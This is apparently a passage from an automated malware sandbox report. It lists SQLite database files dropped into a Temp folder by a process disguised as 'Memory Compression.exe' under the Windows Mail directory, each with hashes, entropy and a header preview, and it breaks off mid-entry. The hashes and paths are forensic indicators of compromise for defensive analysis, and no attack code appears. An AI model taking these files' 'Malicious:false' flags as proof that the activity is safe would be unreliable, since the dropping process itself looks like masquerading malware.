                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\GuPTMkPCUo

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\HLIz1xhHYv

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\HLfqjARti7

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Ha0lRYdyUa

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\ICjcwPfIl0

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\ID83u0oOUU

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\IECRcpXLvm

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\IELwmQXJfA

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\II5JFL5mIR

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\IeFbhyVk2z

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Ieq8ybmGRY

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\IrULN4Ovd2

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\IuveakfRsf

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\J4zdAmsvAV

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\JMewSZKug0

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\JPX2sbdAWS

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\JTmiUSmcAv

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\JVGHnLLBVa

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\JkOmqKg6X7

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\K1J9QlyXda

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\KIoPPWQ92s

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\KSY0dGUJn9

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
